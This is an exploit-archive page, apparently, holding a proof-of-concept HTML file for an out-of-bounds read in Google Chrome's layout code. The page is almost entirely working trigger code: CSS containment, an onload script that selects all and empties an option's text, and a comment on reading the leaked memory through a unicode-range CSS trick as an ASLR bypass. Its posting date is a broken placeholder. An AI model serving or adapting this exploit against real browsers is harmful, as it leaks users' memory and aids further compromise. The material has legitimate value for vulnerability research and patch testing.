Home / exploitsPDF  

Google Chrome 'layout' Out-of-Bounds Read

Posted on 30 November -0001

<HTML><HEAD><TITLE>Google Chrome 'layout' Out-of-Bounds Read</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY><!-- PoC: --> <style> content { contain: size layout; } </style> <script> function leak() { document.execCommand("selectAll"); opt.text = ""; } </script> <body onload=leak()> <content> <select> <option id="opt">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</option> </select> </content> <!-- Since this is a layout bug AFAIK the leaked data can't be obtained via DOM calls, however it's possible to obtain it using tricks like unicode-range CSS descriptor (credits to Jann Horn for coming up with that approach) which is likely sufficient to turn this into an ASLR bypass. --> </BODY></HTML>

 

TOP